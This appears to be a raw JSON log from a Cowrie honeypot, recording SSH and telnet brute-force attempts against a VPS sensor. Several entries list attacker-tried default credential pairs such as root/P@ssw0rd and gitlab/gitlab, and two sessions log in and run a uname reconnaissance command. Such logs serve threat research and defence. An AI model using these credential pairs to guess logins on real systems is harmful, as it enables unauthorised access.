{"eventid":"cowrie.session.closed","duration":12.725861072540283,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:15:30.985017Z","src_ip":"212.227.125.160","session":"c795551f840a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58744,"dst_ip":"1.2.3.4","dst_port":23,"session":"6badf4822753","protocol":"telnet","message":"New connection: 212.227.125.160:58744 (1.2.3.4:23) [session: 6badf4822753]","sensor":"my-vps","timestamp":"2025-08-31T02:15:31.101017Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:15:31.992150Z","src_ip":"41.226.27.251","session":"ce412174816e"}
{"eventid":"cowrie.session.closed","duration":13.142862558364868,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:15:44.243815Z","src_ip":"212.227.125.160","session":"6badf4822753"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58984,"dst_ip":"1.2.3.4","dst_port":23,"session":"50539d839e13","protocol":"telnet","message":"New connection: 212.227.125.160:58984 (1.2.3.4:23) [session: 50539d839e13]","sensor":"my-vps","timestamp":"2025-08-31T02:15:44.347458Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":48882,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dfb59e262a4","protocol":"ssh","message":"New connection: 41.226.27.251:48882 (1.2.3.4:22) [session: 7dfb59e262a4]","sensor":"my-vps","timestamp":"2025-08-31T02:15:50.908950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:15:50.986366Z","src_ip":"41.226.27.251","session":"7dfb59e262a4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:15:50.987376Z","src_ip":"41.226.27.251","session":"7dfb59e262a4"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:15:51.181245Z","src_ip":"41.226.27.251","session":"7dfb59e262a4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:15:51.293008Z","src_ip":"41.226.27.251","session":"7dfb59e262a4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:15:51.293684Z","src_ip":"41.226.27.251","session":"7dfb59e262a4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:15:51.342190Z","src_ip":"41.226.27.251","session":"7dfb59e262a4"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:15:51.343286Z","src_ip":"41.226.27.251","session":"7dfb59e262a4"}
{"eventid":"cowrie.session.closed","duration":12.946144104003906,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:15:57.293528Z","src_ip":"212.227.125.160","session":"50539d839e13"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59220,"dst_ip":"1.2.3.4","dst_port":23,"session":"499a286a922c","protocol":"telnet","message":"New connection: 212.227.125.160:59220 (1.2.3.4:23) [session: 499a286a922c]","sensor":"my-vps","timestamp":"2025-08-31T02:15:57.401931Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49242,"dst_ip":"1.2.3.4","dst_port":22,"session":"de33ed1d649d","protocol":"ssh","message":"New connection: 212.227.235.229:49242 (1.2.3.4:22) [session: de33ed1d649d]","sensor":"my-vps","timestamp":"2025-08-31T02:15:58.816958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:15:59.868266Z","src_ip":"212.227.235.229","session":"de33ed1d649d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:15:59.868910Z","src_ip":"212.227.235.229","session":"de33ed1d649d"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"abc123","message":"login attempt [elastic/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:16:05.803008Z","src_ip":"212.227.235.229","session":"de33ed1d649d"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:16:07.622698Z","src_ip":"212.227.235.229","session":"de33ed1d649d"}
{"eventid":"cowrie.session.closed","duration":12.867554903030396,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:16:10.269418Z","src_ip":"212.227.125.160","session":"499a286a922c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59497,"dst_ip":"1.2.3.4","dst_port":23,"session":"6d7afbeabf82","protocol":"telnet","message":"New connection: 212.227.125.160:59497 (1.2.3.4:23) [session: 6d7afbeabf82]","sensor":"my-vps","timestamp":"2025-08-31T02:16:10.372834Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":41902,"dst_ip":"1.2.3.4","dst_port":22,"session":"adcac0d29910","protocol":"ssh","message":"New connection: 41.226.27.251:41902 (1.2.3.4:22) [session: adcac0d29910]","sensor":"my-vps","timestamp":"2025-08-31T02:16:11.563604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:16:11.564430Z","src_ip":"41.226.27.251","session":"adcac0d29910"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:16:11.612525Z","src_ip":"41.226.27.251","session":"adcac0d29910"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-31T02:16:11.757008Z","src_ip":"41.226.27.251","session":"adcac0d29910"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:16:13.001931Z","src_ip":"41.226.27.251","session":"adcac0d29910"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39660,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb1f175ec174","protocol":"ssh","message":"New connection: 212.227.125.160:39660 (1.2.3.4:22) [session: fb1f175ec174]","sensor":"my-vps","timestamp":"2025-08-31T02:16:20.648510Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:16:20.871569Z","src_ip":"212.227.125.160","session":"fb1f175ec174"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:16:20.872272Z","src_ip":"212.227.125.160","session":"fb1f175ec174"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"abc123","message":"login attempt [elastic/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:16:22.431864Z","src_ip":"212.227.125.160","session":"fb1f175ec174"}
{"eventid":"cowrie.session.closed","duration":12.657515525817871,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:16:23.030279Z","src_ip":"212.227.125.160","session":"6d7afbeabf82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59719,"dst_ip":"1.2.3.4","dst_port":23,"session":"c59f3a0bf369","protocol":"telnet","message":"New connection: 212.227.125.160:59719 (1.2.3.4:23) [session: c59f3a0bf369]","sensor":"my-vps","timestamp":"2025-08-31T02:16:23.143491Z"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:16:24.973039Z","src_ip":"212.227.125.160","session":"fb1f175ec174"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":59484,"dst_ip":"1.2.3.4","dst_port":22,"session":"76bd465c107d","protocol":"ssh","message":"New connection: 41.226.27.251:59484 (1.2.3.4:22) [session: 76bd465c107d]","sensor":"my-vps","timestamp":"2025-08-31T02:16:31.741945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:16:31.743043Z","src_ip":"41.226.27.251","session":"76bd465c107d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:16:31.788496Z","src_ip":"41.226.27.251","session":"76bd465c107d"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab","message":"login attempt [gitlab/gitlab] failed","sensor":"my-vps","timestamp":"2025-08-31T02:16:31.925787Z","src_ip":"41.226.27.251","session":"76bd465c107d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:16:33.145533Z","src_ip":"41.226.27.251","session":"76bd465c107d"}
{"eventid":"cowrie.session.closed","duration":13.010383129119873,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:16:36.153804Z","src_ip":"212.227.125.160","session":"c59f3a0bf369"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60006,"dst_ip":"1.2.3.4","dst_port":23,"session":"0de741dcddea","protocol":"telnet","message":"New connection: 212.227.125.160:60006 (1.2.3.4:23) [session: 0de741dcddea]","sensor":"my-vps","timestamp":"2025-08-31T02:16:36.259381Z"}
{"eventid":"cowrie.session.closed","duration":12.774592876434326,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:16:49.033907Z","src_ip":"212.227.125.160","session":"0de741dcddea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60228,"dst_ip":"1.2.3.4","dst_port":23,"session":"b5aad6188072","protocol":"telnet","message":"New connection: 212.227.125.160:60228 (1.2.3.4:23) [session: b5aad6188072]","sensor":"my-vps","timestamp":"2025-08-31T02:16:49.133711Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":57928,"dst_ip":"1.2.3.4","dst_port":22,"session":"25edd8f77933","protocol":"ssh","message":"New connection: 41.226.27.251:57928 (1.2.3.4:22) [session: 25edd8f77933]","sensor":"my-vps","timestamp":"2025-08-31T02:16:51.662039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:16:51.731235Z","src_ip":"41.226.27.251","session":"25edd8f77933"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:16:51.732080Z","src_ip":"41.226.27.251","session":"25edd8f77933"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache123","message":"login attempt [apache/apache123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:16:51.915708Z","src_ip":"41.226.27.251","session":"25edd8f77933"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:16:53.148767Z","src_ip":"41.226.27.251","session":"25edd8f77933"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58818,"dst_ip":"1.2.3.4","dst_port":22,"session":"af259c0a2405","protocol":"ssh","message":"New connection: 212.227.235.229:58818 (1.2.3.4:22) [session: af259c0a2405]","sensor":"my-vps","timestamp":"2025-08-31T02:16:59.245521Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:16:59.983934Z","src_ip":"212.227.235.229","session":"af259c0a2405"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:16:59.984899Z","src_ip":"212.227.235.229","session":"af259c0a2405"}
{"eventid":"cowrie.session.closed","duration":12.879407167434692,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:17:02.013020Z","src_ip":"212.227.125.160","session":"b5aad6188072"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33493,"dst_ip":"1.2.3.4","dst_port":23,"session":"d06c635db540","protocol":"telnet","message":"New connection: 212.227.125.160:33493 (1.2.3.4:23) [session: d06c635db540]","sensor":"my-vps","timestamp":"2025-08-31T02:17:02.120548Z"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:17:05.977791Z","src_ip":"212.227.235.229","session":"af259c0a2405"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:17:07.841951Z","src_ip":"212.227.235.229","session":"af259c0a2405"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":37036,"dst_ip":"1.2.3.4","dst_port":22,"session":"073fcc056122","protocol":"ssh","message":"New connection: 41.226.27.251:37036 (1.2.3.4:22) [session: 073fcc056122]","sensor":"my-vps","timestamp":"2025-08-31T02:17:11.876066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:17:11.920931Z","src_ip":"41.226.27.251","session":"073fcc056122"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:17:11.922158Z","src_ip":"41.226.27.251","session":"073fcc056122"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:17:12.094959Z","src_ip":"41.226.27.251","session":"073fcc056122"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:17:12.196181Z","src_ip":"41.226.27.251","session":"073fcc056122"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:17:12.196938Z","src_ip":"41.226.27.251","session":"073fcc056122"}
